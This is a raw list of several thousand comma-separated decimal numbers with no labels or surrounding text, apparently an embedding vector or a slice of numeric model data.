-0.030136536806821823, -0.024318847805261612, -0.032445382326841354, -0.007340464275330305, 0.003803142812103033, 0.006596164777874947, -0.005282248370349407, -0.04383772239089012, -0.02343784086406231, 0.014969534240663052, 0.01979229226708412, 0.0038999775424599648, -0.021873291581869125, 0.015827758237719536, 0.024485936388373375, -0.0033816262148320675, 0.002789224497973919, 0.009789817035198212, 0.009212605655193329, -0.022359365597367287, 0.011149303056299686, 0.0023620116990059614, -0.002865173388272524, -0.015736619010567665, 0.020339123904705048, -0.008415141142904758, 0.001494295196607709, -0.011392340064048767, 0.011255631223320961, -0.003096817759796977, -0.05368070304393768, 0.027888447046279907, 0.011574617587029934, 0.033144112676382065, 0.01951887458562851, 0.0066531263291835785, -0.014741688035428524, 0.0077999550849199295, 0.010898672044277191, -0.006056927144527435, -0.009622729383409023, -0.023787206038832664, 0.0047468082047998905, 0.003577194642275572, -0.04225798696279526, 0.014954344369471073, 0.031837791204452515, -0.004932883195579052, -0.009174630977213383, 0.030652988702058792, -0.0012654990423470736, -0.01021513156592846, 0.022647971287369728, -0.026612505316734314, 0.00218543061055243, -0.009516401216387749, -0.01567585952579975, 0.00010543847747612745, -0.006026547867804766, -0.01880495622754097, 0.027523892000317574, -0.011012595146894455, -0.012789799831807613, -0.030789697542786598, -0.029635272920131683, 0.012432839721441269, -0.014004983007907867, 0.0070404657162725925, 0.009873361326754093, 0.013731567189097404, 0.008977163583040237, -0.023954292759299278, -0.014468271285295486, 0.005426551215350628, 0.02283024787902832, -0.018121415749192238, -0.0017135977977886796, -0.01312397513538599, -0.030531469732522964, -0.01206828560680151, 0.009455641731619835, -0.00467465678229928, -0.0007751538068987429, -0.00018797360826283693, -0.012151828967034817, -0.015060673467814922, -0.005365792196244001, -0.0005392374005168676, 0.010556901805102825, -0.03150361776351929, 0.007667044643312693, 0.006922745145857334, 0.008923999033868313, 0.02574668824672699, -0.03451119363307953, -0.003550612600520253, -0.011878413148224354, 0.03338715061545372, -0.0061594583094120026, -0.0044999741949141026, -0.007454387843608856, 0.0049936422146856785, 0.004989844746887684, 0.0017734075663611293, 0.02825300209224224, 0.02223784662783146, -0.011255631223320961, 0.011787273921072483, -0.0279643964022398, 0.011080948635935783, 0.0037632696330547333, 0.02322518266737461, -0.013564479537308216, -0.01819736324250698, 0.005521487444639206, 0.04638960584998131, -0.011293605901300907, -0.018926473334431648, 0.01211385428905487, 0.00909868162125349, 0.01930621825158596, -0.0343896746635437, 0.02603529393672943, -0.02766060084104538, 0.008240459486842155, -0.012455624528229237, -0.02735680527985096, 0.005248071160167456, -0.021447978913784027, 0.01597965508699417, -0.010298674926161766, -0.031139062717556953, -0.028890972957015038, 0.03830864280462265, -0.0017961922567337751, -0.01869862712919712, -0.015934085473418236, 0.010093612596392632, 0.004636682104319334, -0.01282017957419157, -0.0213264599442482, 0.030941594392061234, 0.0158885158598423, -0.025503650307655334, -0.00935690850019455, 0.000470171362394467, -0.04368582367897034, -0.006975909229367971, 0.028192242607474327, -0.03496688976883888, 0.0026866935659199953, -0.01882014609873295, 0.00633414089679718, 0.028693506494164467, 0.013169544748961926, 0.024759352207183838, 0.00004197958696749993, -0.0037632696330547333, -0.004591112956404686, 0.008050587028265, 0.009797411970794201, -0.018744196742773056, 0.024394797161221504, 0.0024455555249005556, -0.026430228725075722, 0.0253517534583807, -0.0031708679161965847, 0.02043026313185692, 0.01769610121846199, 0.004758200608193874, 0.01266828179359436, -0.02170620486140251, -0.005851865280419588, -0.007701221853494644, 0.03964534401893616, -0.0016585347475484014, 0.03651624545454979, 0.01841002143919468, -0.006398697383701801, -0.02093152515590191, 0.034055501222610474, -0.035452961921691895, 0.0014022071845829487, -0.018546728417277336, -0.01689104177057743, -0.011156897991895676, -0.02515428699553013, -0.006174648180603981, -0.016754334792494774, 0.004416430369019508, -0.02191886119544506, 0.027022629976272583, 0.03205044940114021, -0.00201264675706625, 0.020156847313046455, 0.013868275098502636, 0.003189855022355914, -0.009303743951022625, -0.027280855923891068, 0.006584772374480963, -0.017422685399651527, 0.03271880000829697, -0.005760726518929005, -0.002772135892882943, -0.02585301548242569, 0.026399848982691765, 0.00966070406138897, -0.0036455485969781876, -0.03226310759782791, -0.012015121057629585, -0.006425279658287764, -0.00040751349297352135, -0.018987232819199562, 0.021493548527359962, 0.010070828720927238, -0.013161949813365936, 0.002536694286391139, -0.023073285818099976, 0.003918964881449938, -0.026369469240307808, 0.03934154659509659, 0.000037974466977175325, 0.016739144921302795, -0.008483495563268661, 0.0052404762245714664, 0.03138209879398346, -0.03855167701840401, 0.013921438716351986, -0.006827808916568756, -0.015318899415433407, -0.0225264523178339, 0.015394848771393299, -0.011346770450472832, -0.02845047041773796, -0.01699737086892128, 0.025777067989110947, 0.034237779676914215, -0.009288554079830647, -0.02223784662783146, -0.02825300209224224, -0.030334003269672394, 0.00044928540592081845, -0.0035335239954292774, 0.013549289666116238, -0.001494295196607709, -0.02785806730389595, -0.004032888449728489, 0.02907325141131878, 0.030015017837285995, -0.012584737502038479, 0.007135401945561171, 0.0424402616918087, 0.002525301882997155, -0.003136690938845277, -0.027888447046279907, -0.02184291183948517, -0.007363249082118273, -0.01165816094726324, 0.00495566800236702, 0.005870852619409561, 0.06288571655750275, -0.015964465215802193, 0.006956921890377998, 0.025290993973612785, 0.03320487216114998, -0.007025276310741901, -0.041893430054187775, -0.02533656358718872, 0.017179647460579872, -0.0025461879558861256, 0.02775174006819725, 0.02334670163691044, -0.0013044228544458747, 0.004803769756108522, 0.00035292518441565335, -0.0050695911049842834, -0.0009797412203624845, -0.013989793136715889, -0.012448029592633247, 0.0007471475983038545, -0.020855575799942017, -0.005794903263449669, 0.006034142803400755, 0.009683488868176937, -0.011392340064048767, -0.00020684217452071607, 0.016921421512961388, 0.0076974243856966496, -0.009873361326754093, -0.019731532782316208, -0.0025822636671364307, -0.030835265293717384, -0.016177121549844742, -0.019473306834697723, -0.030440332368016243, -0.01608598418533802, 0.03818712383508682, -0.002508213510736823, -0.00455313827842474, -0.02442517690360546, 0.0027056806720793247, 0.010868292301893234, 0.024166949093341827, 0.006448064465075731, -0.011589806526899338, 0.02946818619966507, -0.00920501071959734, -0.043503548949956894, 0.015615100041031837, -0.009432856924831867, -0.01443029660731554, -0.007777170743793249, -0.006075914483517408, 0.017073320224881172, 0.04687568172812462, -0.02342265099287033, 0.011225252412259579, 0.00849868543446064, -0.025913774967193604, -0.002054418670013547, -0.01196195650845766, -0.021098613739013672, -0.011529047973453999, 0.055473100394010544, -0.02524542436003685, 0.019761912524700165, -0.018045466393232346, 0.021098613739013672, 0.01710369996726513, -0.029422616586089134, -0.008544255048036575, 0.020749248564243317, -0.0050126295536756516, 0.032354243099689484, -0.04948832467198372, 0.016572056338191032, 0.0027113768737763166, -0.005008832085877657, -0.02153911627829075, -0.0032999811228364706, -0.04353392869234085, -0.04116431996226311, -0.023012526333332062, -0.006056927144527435, 0.005305032711476088, 0.018546728417277336, 0.008050587028265, 0.018227742984890938, 0.009607539512217045, -0.031199820339679718, 0.011627781204879284, -0.01206069067120552, -0.008134130388498306, 0.018273312598466873, 0.005734144244343042, 0.00490630092099309, 0.009934119880199432, -0.00721514830365777, 0.002234797226265073, 0.05121995881199837, 0.058997128158807755, -0.02717452682554722, -0.009463236667215824, -0.017377115786075592, 0.0025272006168961525, -0.0034461827017366886, 0.020992284640669823, -0.0011316391173750162, 0.0028803632594645023, 0.03320487216114998, 0.020855575799942017, 0.027903636917471886, 0.019564444199204445, 0.013739162124693394, 0.01830369234085083, -0.0040176985785365105, -0.01758977212011814, 0.016754334792494774, -0.0267644040286541, -0.011179682798683643, 0.007370844017714262, 0.024015052244067192, 0.015060673467814922, -0.04095166549086571, 0.010230321437120438, -0.0035392201971262693, 0.020278364419937134, 0.005175919737666845, 0.010708799585700035, -0.01771129108965397, -0.004636682104319334, 0.0066379364579916, -0.0039455471560359, 0.03891623392701149, -0.012622712180018425, 0.026779593899846077, 0.002836692612618208, -0.0029031478334218264, -0.007450590375810862, 0.016830282285809517, -0.011604996398091316, -0.00950121134519577, -0.017559392377734184, 0.01989861950278282, -0.04295671731233597, -0.020764438435435295, -0.019366977736353874, 0.015493582002818584, 0.00834678765386343, 0.006599962245672941, 0.012812584638595581, 0.008460710756480694, 0.010298674926161766, -0.02243531495332718, -0.01728597655892372, 0.022708730772137642, -0.018668247386813164, 0.012182208709418774, 0.002707579405978322, 0.003565802238881588, -0.016617625951766968, 0.00015688201528973877, -0.017255596816539764, -0.023058095946907997, 0.03144285827875137, -0.03891623392701149, -0.0008624950423836708, 0.0033208669628947973, -0.026916300877928734, 0.013898654840886593, 0.006660721264779568, -0.019534064456820488, -0.032445382326841354, 0.019488496705889702, -0.009326528757810593, -0.023589737713336945, 0.019366977736353874, 0.021873291581869125, 0.08360458165407181, 0.008703747764229774, -0.017225217074155807, -0.01939735747873783, -0.017240406945347786, -0.002358214231207967, 0.006148065906018019, 0.020597349852323532, 0.008399952203035355, 0.011042974889278412, 0.009842981584370136, 0.010853102430701256, 0.01106575969606638, 0.0009787918534129858, 0.004256937652826309, 0.017027750611305237, 0.0073442617431283, 0.0012246764963492751, 0.021144183352589607, -0.0057987007312476635, 0.007701221853494644, 0.003812636248767376, 0.007374641019850969, -0.01751382276415825, 0.022359365597367287, -0.029787171632051468, -0.011460693553090096, -0.007613880559802055, -0.030698558315634727, -0.0009507857030257583, 0.011984741315245628, 0.015873325988650322, -0.008324002847075462, -0.0029278313741087914, 0.004587315488606691, -0.010648040100932121, 0.021204940974712372, 0.02143278904259205, -0.0009636020404286683, -0.03098716400563717, 0.007765778340399265, -0.027706170454621315, -0.019139131531119347, -0.0028993503656238317, -0.005870852619409561, -0.036850422620773315, 0.0236201174557209, 0.006706290878355503, -0.009432856924831867, 0.00227656913921237, 0.006516418419778347, -0.022906197234988213, -0.007959447801113129, 0.04617695137858391, 0.002303151413798332, 0.013648022897541523, -0.0011971450876444578, -0.00212467135861516, -0.023589737713336945, -0.014339158311486244, 0.010731584392488003, 0.012774609960615635, -0.0057721189223229885, 0.01006323378533125, 0.014817636460065842, -0.012751825153827667, -0.0426529198884964, -0.006372115574777126, 0.0009151846170425415, 0.006258192006498575, -0.0022328984923660755, 0.004230355378240347, 0.021068233996629715, 0.010245511308312416, 0.016921421512961388, 0.005301235243678093, -0.02311885543167591, 0.025199854746460915, -0.03144285827875137, -0.0020791019778698683, 0.033144112676382065, 0.01353409979492426, 0.025275804102420807, 0.03326563164591789, -0.019868239760398865, 0.026931490749120712, 0.0015541049651801586, 0.002770237158983946, -0.013063216581940651, 0.004256937652826309, -0.0035411189310252666, -0.018774576485157013, 0.00048607317148707807, 0.017772050574421883, 0.00004183124838164076, 0.025777067989110947, -0.006102496758103371, -0.0026753011625260115, -0.023483410477638245, -0.028313761577010155, -0.0016984079265967011, 0.014939154498279095, 0.041103560477495193, -0.007317679468542337, 0.01801508665084839, 0.004184786230325699, -0.006808821577578783, 0.012432839721441269, 0.02009608782827854, -0.010237916372716427, -0.05444019287824631, -0.020946715027093887, -0.002747452585026622, -0.034754231572151184, 0.0007348058861680329, -0.0035164356231689453, 0.009599944576621056, 0.013465745374560356, -0.020688489079475403, -0.003843015991151333, -0.004750605672597885, -0.015501176938414574, 0.03630359098315239, -0.011316390708088875, -0.004245545249432325, 0.00809615571051836, -0.00490630092099309, -0.00935690850019455, 0.049032628536224365, 0.03402512148022652, 0.01689104177057743, 0.0005401867674663663, -0.01579737849533558, -0.018425211310386658, 0.042288366705179214, -0.03268842026591301, 0.03612131252884865, 0.024485936388373375, 0.014969534240663052, -0.003514536889269948, -0.009941714815795422, 0.029225148260593414, 0.01831888221204281, -0.0049176933243870735, 0.01096702553331852, 0.011354365386068821, 0.026232760399580002, 0.00721514830365777, 0.019123941659927368, 0.023407461121678352, 0.005491107702255249, -0.030349193140864372, -0.002648718887940049, 0.033630188554525375, 0.0009711969760246575, -0.009372098371386528, 0.006148065906018019, -0.015334089286625385, -0.03378208354115486, 0.015037888661026955, 0.020749248564243317, 0.020566970109939575, 0.022496072575449944, -0.013048026710748672, -0.002189227845519781, 0.02384796366095543, -0.0019708748441189528, -0.01690623164176941, -0.02483529970049858, -0.018258122727274895, 0.011718920432031155, 0.01992899924516678, -0.02565554901957512, -0.010541711933910847, 0.019351787865161896, 0.02684035152196884, 0.0018873309018090367, -0.01769610121846199, 0.027736550197005272, -0.009683488868176937, 0.014217640273272991, 0.021159373223781586, -0.0016737246187403798, -0.01670876517891884, 0.010245511308312416, -0.012296131812036037, 0.010670824907720089, 0.016116363927721977, -0.02694668062031269, 0.016344210132956505, 0.014248019084334373, 0.02574668824672699, -0.020050518214702606, -0.015159406699240208, -0.010716394521296024, -0.00039398507215082645, -0.005855662748217583, -0.02585301548242569, -0.009121466428041458, -0.0008525267476215959, -0.016450539231300354, -0.022465694695711136, -0.0033208669628947973, -0.015159406699240208, -0.00014050552272237837, -0.02243531495332718, -0.007051858119666576, -0.01880495622754097, -0.009873361326754093, -0.010093612596392632, -0.010883482173085213, -0.007667044643312693, 0.000884330365806818, 0.02204038016498089, 0.0092505794018507, 0.004940478131175041, -0.01142271887511015, -0.03539220243692398, 0.0077733732759952545, 0.03016691468656063, -0.01483282633125782, 0.00950880628079176, 0.00879488606005907, -0.002284164074808359, -0.03408588096499443, -0.007913879118859768, 0.02404543198645115, -0.013769540935754776, -0.020293554291129112, 0.0030569445807486773, -0.025093527510762215, 0.0014848016435280442, 0.01901761256158352, 0.02705300971865654, -0.0036683334037661552, -0.011711325496435165, 0.01251638401299715, 0.01543282251805067, 0.013602453283965588, -0.032536521553993225, -0.008088560774922371, -0.008658178150653839, -0.02302771620452404, 0.013944223523139954, 0.002105684019625187, -0.00033014052314683795, 0.016845472157001495, 0.001603471813723445, -0.010344244539737701, 0.026612505316734314, -0.021204940974712372, -0.0008131282520480454, -0.01758977212011814, -0.0005202501779422164, -0.003637953894212842, 0.05140223726630211, 0.002426568418741226, 0.005388576537370682, 0.017969517037272453, 0.0023525182623416185, 0.019959378987550735, -0.011437908746302128, -0.025974534451961517, 0.011999931186437607, -0.008065776899456978, 0.035544101148843765, -0.00295441341586411, 0.0077543859370052814, 0.011073354631662369, 0.006751860026270151, -0.004655669443309307, -0.018759386613965034, 0.0032942849211394787, -0.006402494851499796, -0.0009517350699752569, -0.015736619010567665, 0.0036816245410591364, -0.011802463792264462, 0.011050569824874401, 0.0016746739856898785, -0.01266828179359436, 0.05814650282263756, 0.007363249082118273, -0.008825265802443027, 0.005586043931543827, -0.001821825047954917, -0.046298470348119736, -0.0050581987015903, 0.0022044177167117596, -0.004298709332942963, -0.012873344123363495, 0.002132266294211149, -0.004720225930213928, -0.027311235666275024, 0.0015968262450769544, -0.006394899915903807, -0.021645445376634598, 0.019427737221121788, -0.047817446291446686, 0.0020164442248642445, 0.025078337639570236, 0.016040414571762085, 0.01221258845180273, 0.015250544995069504, -0.005191109608858824, 0.00006995608418947086, -0.025716308504343033, -0.01962520368397236, 0.0018512551905587316, 0.0006811670027673244, 0.004089850001037121, -0.018151795491576195, -0.019123941659927368, -0.03973647952079773, -0.004682251717895269, -0.0049176933243870735, -0.00043907976942136884, 0.005293640308082104, 0.0036170678213238716, 0.0012351195327937603, 0.00237720157019794, -0.004970857407897711, -0.01790875755250454, -0.017437875270843506, -0.022177087143063545, 0.00030640646582469344, 0.007727803662419319, -0.00048061434063129127, 0.010610065422952175, -0.01252397894859314, 0.010556901805102825, 0.015303709544241428, 0.029528943821787834, -0.004488581791520119, -0.017620151862502098, -0.01544041745364666, 0.003262006677687168, 0.0029790967237204313, -0.005996168125420809, -0.003474663710221648, -0.026521366089582443, 0.025199854746460915, -0.008035397157073021, 0.00789868924766779, 0.022480884566903114, 0.0024626441299915314, 0.018166983500123024, 0.008589823730289936, -0.007203756365925074, -0.018273312598466873, -0.033235251903533936, -0.003702510381117463, 0.0023753028362989426, -0.0016348008066415787, 0.007055655587464571, 0.009934119880199432, -0.0132758729159832, 0.012949292548000813, -0.020491022616624832, -0.015394848771393299, -0.019655583426356316, 0.013154354877769947, -0.006007560528814793, 0.0016139148501679301, -0.008468305692076683, -0.007389830891042948, -0.003543017664924264, 0.009577160701155663, 0.021144183352589607, -0.011734110303223133, -0.006011357996612787, 0.0030056789983063936, 0.010427787899971008, -0.005267058499157429, 0.009630324319005013, 0.009364503435790539, 0.03229348734021187, -0.01799989677965641, -0.012189803645014763, 0.016025224700570107, 0.0055062975734472275, -0.004834149498492479, 0.006524013355374336, 0.005084780976176262, -0.03888585418462753, 0.013685997575521469, -0.02081000804901123, 0.010594875551760197, -0.016329020261764526, -0.013093595393002033, -0.0012408156180754304, -0.003854408161714673, 0.0036037766840308905, 0.026399848982691765, 0.021766964346170425, -0.0069189476780593395, 0.015934085473418236, 0.0014734092401340604, -0.021053044125437737, -0.003001881530508399, 0.023680876940488815, 0.004253140185028315, -0.012136639095842838, 0.019382167607545853, -0.0187138170003891, 0.017331546172499657, -0.021174561232328415, -0.017468255013227463, 0.028890972957015038, 0.00029382744105532765, 0.035847894847393036, 0.002130367560312152, 0.025989724323153496, 0.015151811763644218, 0.0017031547613441944, -0.022192277014255524, -0.024258088320493698, 0.004040483385324478, 0.0003351246705278754, -0.004891111049801111, -0.0015465101459994912, -0.024455556645989418, -0.01006323378533125, -0.04408076032996178, 0.015060673467814922, -0.012865749187767506, 0.005373387131839991, -0.0025328968185931444, 0.022678351029753685, 0.03088083490729332, 0.0025860611349344254, 0.024015052244067192, 0.006877175532281399, -0.024470746517181396, 0.020901145413517952, 0.013473340310156345, -0.014703713357448578, -0.01751382276415825, 0.0030341597739607096, -0.013891059905290604, 0.005289843305945396, 0.0011164492461830378, -0.0042341528460383415, 0.017377115786075592, 0.006041737273335457, -0.006372115574777126, -0.01810622587800026, 0.0044544050469994545, 0.008437925949692726, 0.001948090037330985, 0.012797394767403603, 0.0030170714017003775, 0.014908775687217712, 0.029939068481326103, -0.0012104361085221171, 0.008536660112440586, 0.012091069482266903, 0.02153911627829075, -0.0019936594180762768, 0.00533161498606205, 0.017346736043691635, -0.024182138964533806, 0.02756946161389351, 0.007169579155743122, 0.015630289912223816, 0.0027227692771703005, 0.010382219217717648, -0.007530336733907461, -0.007067047990858555, -0.019291028380393982, 0.015858136117458344, -0.007587298285216093, 0.00029928627191111445, -0.00935690850019455, 0.01597965508699417, -0.01051133219152689, 0.0063607231713831425, -0.014954344369471073, -0.0011173986131325364, -0.013237899169325829, 0.00603034533560276, -0.004344278946518898, -0.013093595393002033, 0.03490613028407097, -0.008118940517306328, 0.0264454185962677, 0.006930340081453323, 0.01667838543653488, 0.005832877941429615, -0.010169561952352524, 0.005399968940764666, -0.0003484157205093652, -0.008999948389828205, 0.01801508665084839, 0.01579737849533558, 0.009713868610560894, 0.004598707892000675, 0.018880903720855713, 0.015463202260434628, -0.004218962974846363, 0.0013490428682416677, -0.014248019084334373, -0.004682251717895269, 0.005305032711476088, 0.019275838509202003, -0.007667044643312693, -0.0015151811530813575, -0.010389814153313637, -0.0009227794944308698, -0.013055621646344662, 0.005248071160167456, -0.009129061363637447, -0.0018626475939527154, 0.006022750400006771, 0.013792325742542744, 0.011027785018086433, -0.014696118421852589, -0.0022651769686490297, -0.013442960567772388, -0.0028879581950604916, -0.002553782891482115, 0.016329020261764526, -0.0073366668075323105, -0.016541676595807076, -0.01126322615891695, 0.013063216581940651, 0.00889362022280693, 0.009979689493775368, -0.01367840263992548, 0.01136196032166481, 0.009774627164006233, -0.011096138507127762, -0.0038468134589493275, -0.012926507741212845, -0.002229101024568081, 0.010549306869506836, 0.020354313775897026, -0.01801508665084839, 0.024470746517181396, -0.016723955050110817, 0.007705019321292639, -0.010025259107351303, 0.003812636248767376, 0.01105816476047039, 0.0021094814874231815, -0.0008762608049437404, 0.007853119634091854, -0.0022215063218027353, -0.009129061363637447, 0.0008947733440436423, 0.008483495563268661, -0.020369503647089005, -0.006410089787095785, -0.02794920653104782, -0.007146794348955154, 0.006987301632761955, -0.004196178633719683, 0.0078910943120718, -0.007594893220812082, 0.016845472157001495, -0.013496125116944313, -0.005422753747552633, 0.008620203472673893, 0.00606072461232543, 0.0007699322886765003, 0.0158885158598423, 0.004720225930213928, -0.0026278330478817225, -0.004192381165921688, -0.017346736043691635, -0.013572074472904205, -0.00007553358591394499, -0.028328951448202133, 0.0032164372969418764, -0.008749316446483135, -0.004461999516934156, -0.013929033651947975, -0.012235373258590698, 0.010921455919742584, -0.013815110549330711, 0.015098647214472294, 0.009774627164006233, -0.028526417911052704, -0.009637919254601002, 0.0010699306149035692, -0.02184291183948517, 0.005715156905353069, -0.014027767814695835, -0.02071886882185936, -0.008156915195286274, 0.011460693553090096, 0.008848050609230995, -0.015425227582454681, -0.006543000228703022, -0.013397391885519028, -0.014885990880429745, -0.020460642874240875, -0.010321459732949734, -0.00019711120694410056, 0.015106242150068283, -0.002906945301219821, 0.015478392131626606, -0.010458167642354965, -0.014620169065892696, -0.002360112965106964, 0.00920501071959734, 0.009311338886618614, 0.016830282285809517, -0.023103665560483932, -0.013693592511117458, 0.0043594688177108765, -0.022359365597367287, -0.0025518841575831175, -0.006588569842278957, -0.011475883424282074, -0.015706239268183708, 0.0018227742984890938, -0.011946766637265682, 0.0060455347411334515, -0.04152887687087059, 0.007777170743793249, 0.01649610884487629, 0.0030189701355993748, 0.005502500105649233, 0.010754368267953396, 0.0011278416495770216, -0.002770237158983946, -0.0027151743415743113, 0.00675945496186614, -0.0006465152837336063, 0.0016082186484709382, 0.032536521553993225, 0.008415141142904758, 0.00804299209266901, -0.001897773938253522, 0.016070794314146042, -0.0010167662985622883, 0.0031499818433076143, -0.00032135890796780586, 0.003655042266473174, 0.0006370216724462807, -0.014734093099832535, -0.00353162526153028, -0.014810041524469852, -0.00865058321505785, 0.005399968940764666, 0.02292138710618019, -0.020946715027093887, -0.01010880246758461, 0.005149337463080883, 0.0019746723119169474, 0.00909868162125349, 0.0035354227293282747, 0.02495681867003441, 0.008475900627672672, -0.0021398612298071384, -0.01921507902443409, -0.007332869339734316, 0.011893603019416332, 0.00980500690639019, 0.017042940482497215, 0.003243019338697195, -0.01799989677965641, 0.009113871492445469, -0.0006313254707492888, 0.010435382835566998, 0.0023696066346019506, 0.012896128930151463, 0.014149285852909088, 0.017422685399651527, -0.013306252658367157, 0.010716394521296024, -0.005616423673927784, 0.003911369945853949, 0.0010803735349327326, -0.004902503453195095, -0.016420159488916397, 0.0022442908957600594, -0.01821255311369896, 0.0021569496020674706, 0.009265769273042679, -0.017331546172499657, 0.010329054668545723, -0.0031347922049462795, -0.0013556884368881583, -0.017316356301307678, -0.031108682975172997, 0.0012408156180754304, -0.0134353656321764, -0.019366977736353874, 0.002289860276505351, 0.005312627647072077, 0.017437875270843506, -0.02746313437819481, -0.00671008788049221, -0.04086052626371384, -0.014544220641255379, 0.009326528757810593, -0.007997422479093075, 0.005548069253563881, 0.01760496199131012, -0.007180971559137106, 0.015630289912223816, -0.003461372572928667, -0.00833919271826744, 0.011999931186437607, -0.003425296861678362, 0.014969534240663052, 0.006854391191154718, -0.011179682798683643, 0.020293554291129112, 0.0022575820330530405, 0.005878447089344263, 0.006679708603769541, 0.00626198947429657, 0.01597965508699417, -0.006277179345488548, -0.020263174548745155, 0.02112899348139763, -0.021994810551404953, -0.02545808255672455, 0.015106242150068283, -0.009448046796023846, -0.03229348734021187, 0.000946038868278265, -0.00389618007466197, -0.021083423867821693, -0.017817620187997818, -0.01740749552845955, 0.0033151707611978054, 0.022693540900945663, -0.002918337704613805, 0.03572637587785721, -0.001093664555810392, -0.000021820484107593074, -0.004705036524683237, -0.006292368751019239, -0.018075846135616302, -0.011650566011667252, -0.014483461156487465, 0.025093527510762215, 0.01141512393951416, 0.013253088109195232, -0.014483461156487465, -0.0022936577443033457, -0.0056012338027358055, -0.0022689744364470243, -0.013207519426941872, -0.019746722653508186, 0.013640427961945534, -0.021645445376634598, 0.010602470487356186, -0.002597453538328409, 0.00996449962258339, 0.02062772959470749, 0.0011838539503514767, -0.004830352030694485, 0.004287317395210266, 0.006789834704250097, -0.009721463546156883, 0.00671008788049221, 0.005931611638516188, 0.022587211802601814, -0.004507569130510092, 0.008589823730289936, 0.005229083821177483, 0.0023696066346019506, -0.0201264675706625, -0.037852946668863297, -0.005369589664041996, 0.02030874416232109, 0.002405682345852256, 0.029620083048939705, -0.01558472029864788, -0.006763252429664135, 0.0009493616526015103, 0.017817620187997818, -0.014772066846489906, 0.01019994169473648, -0.00460250535979867, 0.007272110320627689, -0.0048417444340884686, 0.0023354296572506428, 0.017149269580841064, 0.03205044940114021, 0.0008819569484330714, 0.012167018838226795, 0.014308778569102287, 0.014825231395661831, -0.012167018838226795, 0.0071847690269351006, 0.003871496766805649, -0.003837319789454341, -0.014468271285295486, 0.0021341650281101465, -0.031625136733055115, -0.009410073049366474, 0.005202502012252808, 0.005103768315166235, -0.01165816094726324, -0.011863223277032375, -0.02646060846745968, 0.004591112956404686, 0.013655617833137512, 0.02472897246479988, 0.0064556594006717205, 0.006880973000079393, 0.007499956991523504, 0.011863223277032375, 0.004587315488606691, -0.011491073295474052, 0.002749351318925619, -0.040070656687021255, 0.007742993533611298, 0.0037120040506124496, -0.0003030837106052786, 0.0009322731057181954, 0.019685963168740273, 0.019534064456820488, -0.0077999550849199295, 0.0058480678126215935, 0.015394848771393299, 0.008172105066478252, -0.011012595146894455, 0.011551832780241966, -0.0064556594006717205, 0.010739179328083992, -0.01237208116799593, 0.01882014609873295, -0.022799869999289513, -0.01658724620938301, 0.007237933110445738, 0.015349279157817364, -0.02605048380792141, -0.015334089286625385, 0.007921473123133183, 0.004082255065441132, -0.009075897745788097, -0.026916300877928734, 0.030090967193245888, 0.001065183780156076, -0.0003688269935082644, 0.02182772383093834, 0.0008344888919964433, -0.006451861932873726, -0.015053078532218933, -0.009691083803772926, 0.00058433209778741, -0.006539203226566315, 0.0013499922351911664, 0.004830352030694485, 0.005111363250762224, -0.02343784086406231, 0.009584754705429077, 0.009432856924831867, -0.0063303434289991856, 0.009364503435790539, -0.025670738890767097, -0.01982267200946808, 0.007989827543497086, 0.010078423656523228, 0.012729041278362274, 0.02193405106663704, -0.010298674926161766, -0.0024645428638905287, -0.004055672790855169, -0.018440401181578636, -0.005141742527484894, -0.019139131531119347, -0.011878413148224354, 0.015022698789834976, 0.019853049889206886, 0.00825564842671156, -0.0029164389707148075, -0.0008060080581344664, -0.005521487444639206, -0.0004770542145706713, -0.021189751103520393, -0.03773142769932747, 0.012729041278362274, 0.006782239768654108, 0.018379641696810722, 0.0016841675387695432, -0.010754368267953396, -0.018440401181578636, -0.018531538546085358, 0.008840455673635006, 0.0024151760153472424, -0.005472120363265276, 0.007283502724021673, -0.012007526122033596, 0.012599927373230457, -0.00563541054725647, 0.0372149758040905, 0.03229348734021187, 0.003355043940246105, -0.009767032228410244, -0.000379744655219838, 0.010177156887948513, 0.004853136837482452, 0.004830352030694485, -0.01498472411185503, -0.0027379589155316353, 0.03712383657693863, 0.01222018338739872, 0.014673333615064621, 0.0025746687315404415, -0.011141708120703697, 0.0018436602549627423, 0.02292138710618019, 0.01930621825158596, 0.025108717381954193, -0.015053078532218933, -0.009273364208638668, 0.009311338886618614, 0.0005202501779422164, -0.012311321683228016, -0.007853119634091854, -0.024288468062877655, 0.005035414360463619, 0.01690623164176941, 0.007564513478428125, 0.01567585952579975, -0.01352650485932827, -0.006691101007163525, -0.014908775687217712, 0.00104239908978343, -0.028830213472247124, -0.013579669408500195, -0.021675825119018555, 0.003956939559429884, 0.006580974906682968, 0.02725047618150711, 0.021782154217362404, -0.019427737221121788, 0.0016984079265967011, 0.005760726518929005, -0.015045483596622944, -0.019291028380393982, 0.0017582178115844727, -0.005984775722026825, 0.006622747052460909, -0.0011117025278508663, -0.0001348093501292169, -0.026931490749120712, 0.0010281587019562721, 0.001922457362525165, 0.0001914150343509391, 0.01004804391413927, -0.0018379641696810722, 0.01127082109451294, -0.003803142812103033, 0.005559461656957865, -0.01710369996726513, -0.018136605620384216, -0.012387271039187908, -0.0036873205099254847, -0.0004573549667838961, 0.03302259370684624, -0.026977060362696648, -0.00038995029171928763, -0.011073354631662369, 0.007340464275330305, -0.005643005482852459, -0.006239204667508602, 0.0026904908008873463, 0.0012721446109935641, -0.014316373504698277, 0.008832860738039017, -0.0006479393341578543, -0.011916386894881725, -0.011103733442723751, 0.005061996169388294, -0.01307840645313263, -0.005103768315166235, 0.023604927584528923, 0.008658178150653839, -0.003400613320991397, 0.008240459486842155, 0.002329733455553651, -0.009675893932580948, -0.028480850160121918, -0.02211632952094078, -0.02465302310883999, -0.0199138093739748, -0.012767015025019646, -0.009622729383409023, 0.001412650104612112, 0.01567585952579975, -0.021098613739013672, -0.006459456402808428, -0.015448012389242649, 0.016344210132956505, 0.012030310928821564, 0.021478358656167984, -0.010177156887948513, 0.009068302810192108, -0.003755674697458744, 0.0027512500528246164, -0.0301517266780138, -0.006896162871271372, -0.007492362055927515, -0.024759352207183838, -0.008263243362307549, 0.0032392218708992004, -0.0018702424131333828, -0.006850593723356724, 0.0030683367513120174, 0.014453081414103508, -0.018956853076815605, 0.017134079709649086, -0.008149320259690285, -0.0138227054849267, -0.005141742527484894, 0.00668730353936553, -0.001368030090816319, -0.019837860018014908, 0.019336597993969917, -0.0017819517524912953, 0.0024968211073428392, -0.010427787899971008, 0.00563541054725647, -0.001398409716784954, -0.04022255539894104, -0.01610117405653, -0.022359365597367287, -0.006250597070902586, -0.024364417418837547, -0.001816128846257925, -0.006706290878355503, 0.014407512731850147, 0.007860714569687843, 0.009220200590789318, 0.0016224590362980962, 0.01801508665084839, 0.0033626388758420944, -0.0003182734944857657, -0.010093612596392632, 